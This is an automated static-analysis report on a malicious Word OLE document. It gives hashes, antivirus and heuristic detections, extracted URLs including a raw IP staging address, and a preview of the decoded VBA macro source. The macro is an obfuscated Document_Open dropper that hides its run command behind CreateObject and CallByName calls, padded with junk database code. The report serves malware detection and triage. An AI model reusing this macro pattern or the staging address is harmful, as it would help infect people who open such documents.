Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0e2ebc9de2b20c36…

MALICIOUS

Office (OLE)

127.0 KB Created: 2019-03-21 08:24:00 Authoring application: Microsoft Office Word First seen: 2021-04-10
MD5: 3795c66c89d196c850e0c37405ba51c1 SHA-1: 964ba10f582faf6ddfa58034221fdd375235eaf3 SHA-256: 0e2ebc9de2b20c36ad038ab84a7de6c7a44386c078448ef777eaca6811f8d687
290 Risk Score

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6937918-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6937918-0
  • Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGER
    Raw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set DOBIBOR = CreateObject("" + WINDOWS5.Label2.Tag & "")
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName DOBIBOR, "R" + "un", VbMethod, WINDOWS5.Label55.Tag & Chr(32) + " ACX=CHR(10) " & WINDOWS5.Tag + " " & " DGH=CHR(13) ", 0, False
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://79.141.171.160/alg In document text (OLE body)
    • http://ocsp.sectigo.com0In document text (OLE body)
    • http://ocsp.usertrust.com0In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • https://sectigo.com/CPS0CIn document text (OLE body)
    • http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sIn document text (OLE body)
    • http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#In document text (OLE body)
    • http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0vIn document text (OLE body)
    • http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas🔏 SignedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.
vba-macro oletools.olevba.extract_macros (decoded VBA source) 10241 bytes
SHA-256: 050e090a832298e844fe9272ffb40cf31d5abafbd8fec87840e280be4e3cdd05
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True





    Public Function getQuestionId() As Integer
         getQues.tionValue "id"
    End Function
    Public Function getQuestionId2() As Integer
         getQuest.ionValue "id"
    End Function





Sub Document_Open()

Dim currentPi0 As Object
Dim currentPi7 As Object
Dim currentPi11 As Object
Dim currentPi12 As Object
Dim c As New Class1
c.PowerOn

Dim currentPi5 As Object
Dim currentPi6 As Object
Dim currentPi9 As Object


ActiveDocument.Close False
getQuestionId
Application.Quit False
End Sub
     



Public Sub fill(dgv)
        Dim adapter
        Dim dataset

            connection.Open
            adapter = SqlData.adapter(command)
            dataset = dataset
            adapter.fill (dataset)
            If dataset.Tables.Count > 0 Then
                dgv.Refresh
                dgv.DataSource = dataset.Tables(0)
            End If
            MsgBox (ex.Message)
            Thr.ow ex
            If connection.State = ConnectionState.Open Then
                connection.Close
            End If
End Sub

Sub LoadQuestions()
        db.fill (dgvQuestions)
    End Sub
     Sub LoadToolStripMenuItem_Click(sender, e)
     Hand.les LoadToolStripMenuItem.Click
        LoadQuestions
    End Sub
    Sub printenrolleedepentall()

        Try

            Dim connection As SqlConnection
            Dim command As SqlCommand
            Dim adapter
            Dim dataset
             s_sqlcmd1 = "SELECT code1, company, address, address2, tel, Web, email FROM companytab"
             s_sqlcmd2 = "SELECT enrolleeid, Surname, Firstname, othernames, dregister, sdate, edate, active, nationalid,NHIS, ogaid, hcpid, hcpname, ugstodate,sectortype FROM enrolleetab where Active = '" & False & "'"
            connection = SqlConnection(My.Settings.cnnstring)
            connection.Open

            ' load the table with headers into the dataset
            command = SqlCommand(s_sqlcmd1, connection)
            adapter.SelectCommand = command
            adapter.fill dataset, "companytab" ' tablename *MUST* match with the tablename used in the report

            ' load the 2nd table into the dataset (lines)
            adapter.SelectCommand.CommandText = s_sqlcmd2
            adapter.fill dataset, "enrolleetab"

            ' define the relation between the tables
            ' dataset.Relations.Add("relation", dataset.Tables("bill_headers").Columns("billnr"), dataset.Tables("bill_lines").Columns("parent_billnr"))

            ' dataset is ready, get rid of the objects used to construct it
            adapter.Dispose
            command.Dispose
            connection.Close

            ' Load the defined report with the dataset we just created
            Dim myreport As ReportDocument
            myreport = New ReportDocument
            myreport.Load (My.Settings.Rptpath & "\" & "Enrodep3.rpt")
            myreport.SetDataSource (dataset)

            ' bind viewer
            ' CrystalReportViewer1.DisplayGroupTree = False
            CrystalReportViewer1.ReportSource = myreport
            CrystalReportViewer1.RefreshReport
            CrystalReportViewer1.Show
            CrystalReportViewer1.Refresh
            MessageBox.Show (Excep.Message)


    End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub PowerOn()
Application.Run WINDOWS5.Label3.Tag
End Sub







     Function VerifySysInt(ByVal si As Byte) As Boolean
        
        Dim s As Integer
        Dim i As Integer
        s = 0
        For i = 0 To 254 '&HFB
            s = (s And &HFF) + si(i)
        Next
        s = s And &HFF

        If s = si(255) Then
            VerifySysInt = True
        Else
            VerifySysInt = False
        End If

    End Function

Attribute VB_Name = "Module1"
 Function MakeLong(ByVal extb, ByVal offset As Integer, ByVal sz As Integer) As Double
        Dim i As Integer
        Dim l As Double
        Dim neg As Double
        On Error Resume Next
        MakeLong = 0



        If sz = 3 Then
            If extb(offset) >= 128 Then
                extb(offset) = 128
                neg = -1#
            End If
            MakeLong = ((extb(offset) * (256 ^ 2)) + (extb(offset + 2) * (256 ^ 1)) + extb(offset + 1)) * neg
        End If
        If sz = 4 Then

            MakeLong = (extb(offset + 1) * (256 ^ 3) + extb(offset) * (256 ^ 2)) + (extb(offset + 3) * (256 ^ 1)) + extb(offset + 2)
        End If


        'For i = 0 To sz - 1
        '    l = extb(sz - 1 - i + offset)
        '    MakeLong = MakeLong + l * (256 ^ (i))
        'Next
    End Function



Public Sub PriceCount()
Dim PathTo1 As String
Dim DOBIBOR As Object

Dim eighteen101 As Object

Dim eighteen103 As Object
Dim eighteen109 As Object
Dim eighteen10 As Object
Set DOBIBOR = CreateObject("" + WINDOWS5.Label2.Tag & "")
Dim eighteen105 As Object
Dim eighteen106 As Object

Dim eighteen100 As Object
Dim eighteen107 As Object
On Error Resume Next


Dim eighteen1011 As Object
Dim eighteen1012 As Object
Dim eighteen104 As Object

Dim eighteen1034 As Object
Dim eighteen108 As Object
CallByName DOBIBOR, "R" + "un", VbMethod, WINDOWS5.Label55.Tag & Chr(32) + " ACX=CHR(10) " & WINDOWS5.Tag + " " & " DGH=CHR(13) ", 0, False



End Sub
 Sub Prininvoice()
        ' MessageBox.Show(rptrangecode)
        Try

                            Dim MyCommand As New SqlCommand
                Dim myDA As New SqlDataAdapter
                Dim myDS As New reportdata2  'The DataSet you created.
                Dim cryRpt As New ReportDocument
                cryRpt.Load (My.Settings.Rptpath & "\" & "invoicereport.rpt")
                MyCommand.connection = myConnection2  'AND OP1 = '" & "F7" & "' "
                MyCommand.CommandText = "select * from(select a.billcode,a.descr,a.invoicetopic,a.tdate,a.invoiceno,a.glcode,a.Amtword,a.salesrep,a.stax,a.itotal,a.netdue,a.addressto,a.signby,b.pcode,b.eqty,b.uprice,b.tax,b.discount,b.amt,c.company,c.address,c.address2,c.tel,a.accountname,a.accountno,a.bankname,a.branch,a.sortno from salesinvoicerpt a, sinvoicegridrpt b,companytab c Where rtrim(a.invoiceno) = rtrim(b.invoiceno) and rtrim(a.invoiceno) = '" & RTrim(rptrangecode) & "')school"
                MyCommand.CommandType = CommandType.Text
                myDA.SelectCommand = MyCommand
                myDA.fill myDS, "school"
                cryRpt.SetDataSource (myDS)
                CrystalReportViewer1.ReportSource = cryRpt
                CrystalReportViewer1.RefreshReport
                CrystalReportViewer1.Show
                CrystalReportViewer1.Refresh
            
            'Try
            'Dim cryRpt As New ReportDocument
            'cryRpt.Load(My.Settings.Rptpath & "\" & "invoicereport.rpt")
            'CrystalReportViewer1.ReportSource = cryRpt
            'CrystalReportViewer1.Refresh()
            'Catch ex As Exception
            '    MDIParent1.statusmsg.Text = ex.Message
            'End Try
        Catch
            MessageBox.Show (Excep.Message)
        End
    End Sub


 Sub printenrolleedepentsector()
        Try

            Dim connection As SqlConnection
            Dim command As SqlCommand
            Dim adapter As New SqlDataAdapter
            Dim dataset As New dataset
             s_sqlcmd1 = "SELECT code1, company, address, address2, tel, Web, email FROM companytab"
             s_sqlcmd2 = "SELECT enrolleeid, Surname, Firstname, othernames, dregister, sdate, edate, active, nationalid,NHIS, ogaid, hcpid, hcpname, ugstodate,sectortype FROM enrolleetab where Active = '" & False & "' and sectortype = '" & rptrangecode & "'"
            connection = SqlConnection(My.Settings.cnnstring)
            connection.Open

            ' load the table with headers into the dataset
            command = SqlCommand(s_sqlcmd1, connection)
            adapter.SelectCommand = command
            adapter.fill dataset, "companytab" ' tablename *MUST* match with the tablename used in the report

            ' load the 2nd table into the dataset (lines)
            adapter.SelectCommand.CommandText = s_sqlcmd2
            adapter.fill dataset, "enrolleetab"

            ' define the relation between the tables
            ' dataset.Relations.Add("relation", dataset.Tables("bill_headers").Columns("billnr"), dataset.Tables("bill_lines").Columns("parent_billnr"))

            ' dataset is ready, get rid of the objects used to construct it
            adapter.Dispose
            command.Dispose
            connection.Close

            ' Load the defined report with the dataset we just created
            Dim myreport As ReportDocument
            myreport = New ReportDocument
            myreport.Load (My.Settings.Rptpath & "\" & "Enrodep3.rpt")
            myreport.SetDataSource (dataset)

            ' bind viewer
            ' CrystalReportViewer1.DisplayGroupTree = False
            CrystalReportViewer1.ReportSource = myreport
            CrystalReportViewer1.RefreshReport
            CrystalReportViewer1.Show
            CrystalReportViewer1.Refresh
            MessageBox.Show (Excep.Message)
    End Sub


Attribute VB_Name = "WINDOWS5"
Attribute VB_Base = "0{2685ADE8-8692-49B9-8CE5-EFC8D03F2070}{780488BF-578B-4551-9E02-FFF5D3D52865}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module2"